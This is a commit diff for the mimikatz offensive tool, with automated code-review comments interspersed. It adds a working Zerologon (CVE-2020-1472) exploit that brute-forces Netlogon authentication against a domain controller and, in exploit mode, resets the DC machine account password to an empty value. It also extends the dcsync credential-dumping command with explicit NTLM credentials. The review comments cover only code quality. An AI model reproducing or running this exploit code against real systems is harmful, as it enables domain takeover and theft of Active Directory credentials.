[new] mimikatz lsadump::zerologon (CVE-2020-1472 @SecuraBV @djrevmoon)

[new] mimikatz lsadump::dcsync now supports NTLM auth and explicit credentials
[internal] netlogon RPC instead of NETAPI32.dll (support ncacn_ip_tcp instead of ncacn_np)
Benjamin DELPY 2020-09-16 12:16:07 +02:00
parent ba8d11ebe1
commit 880c15994c
8 changed files with 311 additions and 45 deletions


@ -1,6 +1,6 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2012
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimikatz", "mimikatz\mimikatz.vcxproj", "{FB9B5E61-7C34-4280-A211-E979E1D6977F}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global files", "{1ADABD33-DEBE-4095-8EAE-9B6ED51DB68E}"
@ -30,6 +30,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
inc\WDBGEXTS.H = inc\WDBGEXTS.H
inc\WinBer.h = inc\WinBer.h
inc\wincred.h = inc\wincred.h
inc\WinDNS.h = inc\WinDNS.h
inc\Winldap.h = inc\Winldap.h
EndProjectSection
EndProject
@ -84,69 +85,65 @@ Global
Svn-Managed = True
Manager = AnkhSVN - Subversion Support for Visual Studio
EndGlobalSection
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|ARM64 = Release|ARM64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Release|ARM64 = Release|ARM64
Second_Release_PowerShell|ARM64 = Second_Release_PowerShell|ARM64
Second_Release_PowerShell|Win32 = Second_Release_PowerShell|Win32
Second_Release_PowerShell|x64 = Second_Release_PowerShell|x64
Second_Release_PowerShell|ARM64 = Second_Release_PowerShell|ARM64
Simple_DLL|ARM64 = Simple_DLL|ARM64
Simple_DLL|Win32 = Simple_DLL|Win32
Simple_DLL|x64 = Simple_DLL|x64
Simple_DLL|ARM64 = Simple_DLL|ARM64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.ActiveCfg = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.ActiveCfg = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.Build.0 = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.ActiveCfg = Release|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.Build.0 = Release|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.ActiveCfg = Release|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.Build.0 = Release|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|ARM64.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.Build.0 = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.ActiveCfg = Second_Release_PowerShell|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.Build.0 = Second_Release_PowerShell|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|ARM64.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.ActiveCfg = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.ActiveCfg = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.Build.0 = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.ActiveCfg = Simple_DLL|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.Build.0 = Simple_DLL|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.ActiveCfg = Simple_DLL|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.Build.0 = Simple_DLL|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|Win32.Build.0 = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|x64.Build.0 = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.ActiveCfg = Release|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.Build.0 = Release|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|Win32.Build.0 = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.Build.0 = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.Build.0 = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE


@ -150,6 +150,7 @@
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-credentialkeys.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-dcom_IObjectExporter_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\kull_m_service.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
@ -263,6 +264,7 @@
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dcom_IObjectExporter.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\kull_m_samlib.h" />
<ClInclude Include="..\modules\kull_m_service.h" />


@ -311,6 +311,9 @@
<ClCompile Include="..\modules\kull_m_crypto_ngc.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
@ -641,6 +644,9 @@
<ClInclude Include="..\modules\kull_m_crypto_ngc.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">


@ -20,6 +20,7 @@ const KUHL_M_C kuhl_m_c_lsadump[] = {
{kuhl_m_lsadump_netsync, L"netsync", L"Ask a DC to send current and previous NTLM hash of DC/SRV/WKS"},
{kuhl_m_lsadump_packages, L"packages", NULL},
{kuhl_m_lsadump_mbc, L"mbc", NULL},
{kuhl_m_lsadump_zerologon, L"zerologon", NULL},
};
const KUHL_M kuhl_m_lsadump = {
@ -2436,3 +2437,125 @@ NTSTATUS kuhl_m_lsadump_mbc(int argc, wchar_t * argv[])
}
return STATUS_SUCCESS;
}
// Just to let you know about the little hack to make NETAPI32 to use ncacn_ip_tcp instead of ncacn_np
//
//NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[])
//{
// DWORD i;
// NETLOGON_CREDENTIAL Input = {0}, LazyOutput;
// ULONG NegotiateFlags = 0x212fffff;
//
// PBYTE z = (PBYTE) GetModuleHandle(L"logoncli.dll");
//
// VirtualProtect(z + 0x19031, 1, PAGE_EXECUTE_READWRITE, &i);
// z[0x19031] = 2;
// VirtualProtect(z + 0x19031, 1, i, &i);
//
// for(i = 0; i < 2000; i++)
// {
// I_NetServerReqChallenge(L"dc.lab.local", MIMIKATZ, &Input, &LazyOutput);
// if((I_NetServerAuthenticate2(L"dc.lab.local", L"dc$", ServerSecureChannel, MIMIKATZ, &Input, &LazyOutput, &NegotiateFlags) == STATUS_SUCCESS))
// {
// kprintf(L"\nAuth :)\n");
// break;
// }
// else kprintf(L"=");
// }
// return STATUS_SUCCESS;
//}
// All of that is not very thread safe
handle_t hLogonNetLogon = NULL;
handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name) {return hLogonNetLogon;}
void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon) {}
const wchar_t * SecureChannelTypes[] = {L"Null", L"MsvAp", L"Workstation", L"TrustedDnsDomain", L"TrustedDomain", L"UasServer", L"Server", L"CdcServer"};
NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[])
{
NTSTATUS status;
NETLOGON_AUTHENTICATOR Authenticator = {{0}, 0}, ReturnAuthenticator;
ULONG i, NegotiateFlags = 0x212fffff;
NL_TRUST_PASSWORD ClearNewPassword = {{0}, 0};
LPCWSTR szTarget, szAccount, szType;
NETLOGON_SECURE_CHANNEL_TYPE type = ServerSecureChannel;
BOOL bExploit, bIsAuth = FALSE, bIsChanged = FALSE;
if(kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"account", &szAccount, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"type", &szType, NULL))
type = (NETLOGON_SECURE_CHANNEL_TYPE) wcstoul(szType, NULL, 0);
bExploit = kull_m_string_args_byName(argc, argv, L"exploit", NULL, NULL);
kprintf(L"Target : %s\nAccount: %s\nType : %u (%s)\nMode : %s\n\n", szTarget, szAccount, type, (type < ARRAYSIZE(SecureChannelTypes)) ? SecureChannelTypes[type] : L"?", bExploit ? L"exploit" : L"detect");
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szTarget, NULL, NULL, FALSE, RPC_C_AUTHN_NONE, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hLogonNetLogon, NULL))
{
status = RpcEpResolveBinding(hLogonNetLogon, logon_v1_0_c_ifspec);
if(status == RPC_S_OK)
{
kprintf(L"Trying to \'authenticate\'...\n");
RpcTryExcept
{
for(i = 0; i < 2000; i++)
{
status = NetrServerReqChallenge(NULL, MIMIKATZ, &Authenticator.Credential, &ReturnAuthenticator.Credential);
if(status == STATUS_SUCCESS)
{
status = NetrServerAuthenticate2(NULL, (wchar_t *) szAccount, type, MIMIKATZ, &Authenticator.Credential, &ReturnAuthenticator.Credential, &NegotiateFlags);
if(status == STATUS_SUCCESS)
{
bIsAuth = TRUE;
kprintf(L"\n\n NetrServerAuthenticate2: 0x%08x", status);
if(bExploit)
{
kprintf(L"\n");
status = NetrServerPasswordSet2(NULL, (wchar_t *) szAccount, type, MIMIKATZ, &Authenticator, &ReturnAuthenticator, &ClearNewPassword);
if(status == STATUS_SUCCESS)
{
bIsChanged = TRUE;
kprintf(L" NetrServerPasswordSet2 : 0x%08x", status);
}
else PRINT_ERROR(L"NetrServerPasswordSet2: 0x%08x", status);
}
break;
}
else if(status == STATUS_NO_TRUST_SAM_ACCOUNT)
{
PRINT_ERROR(L"NetrServerAuthenticate2: STATUS_NO_TRUST_SAM_ACCOUNT (cannot find the account or bad type)", status);
break;
}
else if(status != STATUS_ACCESS_DENIED)
{
PRINT_ERROR(L"NetrServerAuthenticate2: 0x%08x", status);
break;
}
else kprintf(L"=");
}
else
{
PRINT_ERROR(L"NetrServerReqChallenge: 0x%08x", status);
break;
}
}
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kprintf(L"\n\n* Authentication: %s\n", bIsAuth ? L"OK -- vulnerable" : L"KO -- maybe not vulnerable");
if(bExploit)
{
kprintf(L"* Set password : %s\n", bIsChanged ? L"OK -- may be unstable" : L"KO");
}
}
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
kull_m_rpc_deleteBinding(&hLogonNetLogon);
}
}
else PRINT_ERROR(L"Missing /account argument, usually a DC$ account\n");
}
else PRINT_ERROR(L"Missing /target argument, can be IP or FQDN of a domain controller\n");
return STATUS_SUCCESS;
}
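Review bot: When `kull_m_rpc_createBinding` at L219 returns FALSE the function prints nothing and still returns STATUS_SUCCESS, unlike every other failure path in this block which goes through PRINT_ERROR; add `else PRINT_ERROR(L"kull_m_rpc_createBinding\n");` after the closing brace at L280 so a failed binding is distinguishable from "not vulnerable". `hLogonNetLogon` at L198 is used only within this file on the page and is declared in neither header, so it can be `static`, and the author's own "not very thread safe" remark at L197 belongs on it as a `// NOTE:` rather than as a free-floating line. At L252 the PRINT_ERROR format has no conversion specifier but is still passed `status`; drop the argument or print it with `0x%08x` like the neighbouring branches. The `kuhl_m_c_lsadump` entry at L164 has a NULL description where its neighbours document the command; a one-line description stating that it tests CVE-2020-1472 and that `/exploit` overwrites the target account's secret with the zero-initialised `ClearNewPassword` from L207 (the code itself warns "may be unstable" at L275) would let an operator see the destructive side effect before running it. The commented-out block at L171-L196 is dead code that a short comment could replace.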


@ -15,6 +15,7 @@
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_samlib.h"
#include "../modules/kull_m_net.h"
#include "../../modules/rpc/kull_m_rpc_ms-nrpc.h"
#include "lsadump/kuhl_m_lsadump_dc.h"
#include "kuhl_m_lsadump_remote.h"
#include "kuhl_m_crypto.h"
@ -69,6 +70,7 @@ NTSTATUS kuhl_m_lsadump_changentlm(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_netsync(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_packages(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_mbc(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[]);
BOOL kuhl_m_lsadump_getSids(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY hPolicyBase, IN LPCWSTR littleKey, IN LPCWSTR prefix);
BOOL kuhl_m_lsadump_getComputerAndSyskey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hSystemBase, OUT LPBYTE sysKey);
@ -501,27 +503,6 @@ PKERB_KEY_DATA kuhl_m_lsadump_lsa_keyDataInfo(PVOID base, PKERB_KEY_DATA keys, U
PKERB_KEY_DATA_NEW kuhl_m_lsadump_lsa_keyDataNewInfo(PVOID base, PKERB_KEY_DATA_NEW keys, USHORT Count, PCWSTR title);
void kuhl_m_lsadump_lsa_DescrBuffer(DWORD type, DWORD rid, PVOID Buffer, DWORD BufferSize);
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {
CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;
typedef struct _NETLOGON_AUTHENTICATOR {
NETLOGON_CREDENTIAL Credential;
DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;
typedef enum _NETLOGON_SECURE_CHANNEL_TYPE{
NullSecureChannel = 0,
MsvApSecureChannel = 1,
WorkstationSecureChannel = 2,
TrustedDnsDomainSecureChannel = 3,
TrustedDomainSecureChannel = 4,
UasServerSecureChannel = 5,
ServerSecureChannel = 6,
CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;
#define SECRET_SET_VALUE 0x00000001L
#define SECRET_QUERY_VALUE 0x00000002L
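Review bot: The new include at L294 uses `../../modules/rpc/kull_m_rpc_ms-nrpc.h` while the surrounding includes at L291-L293 reach the same `modules` tree with a single `../`; if both resolve, it is presumably because MSVC also searches the directories of files further up the include chain, and a path written like its neighbours, `#include "../modules/rpc/kull_m_rpc_ms-nrpc.h"`, would not depend on that. The typedef removal at L308-L325 matches what the new header provides, so the hunk is otherwise a clean move.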


@ -41,8 +41,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
LPWSTR szTmpDc = NULL;
DRS_EXTENSIONS_INT DrsExtensionsInt;
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL);
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
szDomain = pPolicyDnsDomainInfo->DnsDomainName.Buffer;
@ -66,8 +67,31 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
else
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
if(kull_m_string_args_byName(argc, argv, L"authuser", (const wchar_t **) &secIdentity.User, NULL))
{
secIdentity.UserLength = lstrlen((LPCWSTR) secIdentity.User);
if(kull_m_string_args_byName(argc, argv, L"authdomain", (const wchar_t **) &secIdentity.Domain, L""))
{
secIdentity.DomainLength = lstrlen((LPCWSTR) secIdentity.Domain);
}
secIdentity.UserLength = lstrlen((LPCWSTR) secIdentity.User);
if(kull_m_string_args_byName(argc, argv, L"authpassword", (const wchar_t **) &secIdentity.Password, L""))
{
secIdentity.PasswordLength = lstrlen((LPCWSTR) secIdentity.Password);
}
}
if(secIdentity.UserLength)
{
kprintf(L"[AUTH] Username: %s\n[AUTH] Domain : %s\n[AUTH] Password: %s\n", secIdentity.User, secIdentity.Domain, secIdentity.Password);
}
if(bAuthNtlm)
{
kprintf(L"[AUTH] Explicit NTLM Mode\n");
}
kull_m_string_args_byName(argc, argv, L"altservice", &szService, L"ldap");
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
{
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
{
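Review bot: The `/authpassword` value is echoed in clear at L359 together with the user and domain, so any console transcript or log file produced by the run retains the credential; print a placeholder instead, e.g. `kprintf(L"[AUTH] Username: %s\n[AUTH] Domain : %s\n[AUTH] Password: %s\n", secIdentity.User, secIdentity.Domain, secIdentity.PasswordLength ? L"(supplied)" : L"(none)");`. As rendered, `secIdentity.UserLength = lstrlen((LPCWSTR) secIdentity.User);` appears at both L346 and L351; if the page reflects the new side faithfully, the second assignment is redundant and can go. `secIdentity.UserLength ? &secIdentity : NULL` at L367 means an empty `/authuser:` silently falls back to the implicit security context, which deserves a message so the operator knows which identity was used. kuhl_m_lsadump_dcsync starts before and continues past this hunk.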


@ -0,0 +1,40 @@
#pragma once
#include "kull_m_rpc.h"
#include "../kull_m_samlib.h"
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {
CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;
typedef enum _NETLOGON_SECURE_CHANNEL_TYPE {
NullSecureChannel = 0,
MsvApSecureChannel = 1,
WorkstationSecureChannel = 2,
TrustedDnsDomainSecureChannel = 3,
TrustedDomainSecureChannel = 4,
UasServerSecureChannel = 5,
ServerSecureChannel = 6,
CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;
typedef struct _NETLOGON_AUTHENTICATOR {
NETLOGON_CREDENTIAL Credential;
DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;
typedef struct _NL_TRUST_PASSWORD {
WCHAR Buffer[256];
ULONG Length;
} NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD;
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge);
NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags);
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword);
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword);
extern handle_t hLogon;
extern RPC_IF_HANDLE logon_v1_0_c_ifspec;
handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name);
void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon);
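Review bot: The header exports `extern handle_t hLogon` at L404, but nothing on this page assigns it; the binding actually used is the one returned by `LOGONSRV_HANDLE_bind`, which the caller keeps in a differently named global, so a comment on L404 such as `// implicit handle slot required by the MIDL stub descriptor; the live binding comes from LOGONSRV_HANDLE_bind` would stop the two from being confused. The header also does not say where these layouts come from; a one-line comment noting that `NETLOGON_CREDENTIAL`, `NETLOGON_AUTHENTICATOR` and `NL_TRUST_PASSWORD` mirror the MS-NRPC wire structures, and that `NL_TRUST_PASSWORD` is deliberately sized as 256 WCHARs plus a length, would let a maintainer check them against the spec rather than trust them.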


@ -0,0 +1,93 @@
#include "kull_m_rpc_ms-nrpc.h"
typedef struct _netlogon_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[101];
} netlogon_MIDL_TYPE_FORMAT_STRING;
typedef struct _netlogon_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
CHAR Format[309];
#elif defined(_M_IX86)
CHAR Format[301];
#endif
} netlogon_MIDL_PROC_FORMAT_STRING;
extern const netlogon_MIDL_TYPE_FORMAT_STRING netlogon__MIDL_TypeFormatString;
extern const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE logon___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x12345678, 0x1234, 0xabcd, {0xef, 0x00, 0x01, 0x23, 0x45, 0x67, 0xcf, 0xfb}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
RPC_IF_HANDLE logon_v1_0_c_ifspec = (RPC_IF_HANDLE) &logon___RpcClientInterface;
handle_t hLogon;
static const GENERIC_BINDING_ROUTINE_PAIR BindingRoutines[] = {{(GENERIC_BINDING_ROUTINE) LOGONSRV_HANDLE_bind, (GENERIC_UNBIND_ROUTINE) LOGONSRV_HANDLE_unbind}};
static const MIDL_STUB_DESC logon_StubDesc = {(void *) & logon___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &hLogon, 0, BindingRoutines, 0, 0, netlogon__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[0], PrimaryName, ComputerName, ClientChallenge, ServerChallenge).Simple;
}
